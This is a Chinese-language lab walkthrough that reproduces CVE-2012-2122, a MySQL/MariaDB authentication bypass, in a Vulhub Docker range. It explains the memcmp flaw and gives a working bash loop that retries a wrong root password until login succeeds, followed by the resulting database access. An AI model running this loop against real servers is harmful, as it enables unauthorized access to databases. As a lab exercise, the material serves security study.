开启靶场
java
[root@localhost vulhub-master]# cd mysql
[root@localhost mysql]# ls
CVE-2012-2122
[root@localhost mysql]# cd CVE-2012-2122/
[root@localhost CVE-2012-2122]# docker-compose up -d
WARN[0000] /var/local/soft/vulhub-master/mysql/CVE-2012-2122/docker-compose.yml: the attribute `version` is obsolete, it will be ignored, please remove it to avoid potential confusion
[+] Running 1/1
✔ Container cve-2012-2122-mysql-1 S... 4.7s当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。
受影响版本:
- MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
- MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456。
在不知道我们环境正确密码的情况下,在bash下运行如下命令,在一定数量尝试后便可成功登录:
for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done
java
for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.142.131 -P3307; done
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
.....
...
..
.可以看到已经绕过登录进入了数据库,接下来可以执行命令,查询数据库表格结构,提权等操作
java
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| test |
+--------------------+
4 rows in set (0.21 sec)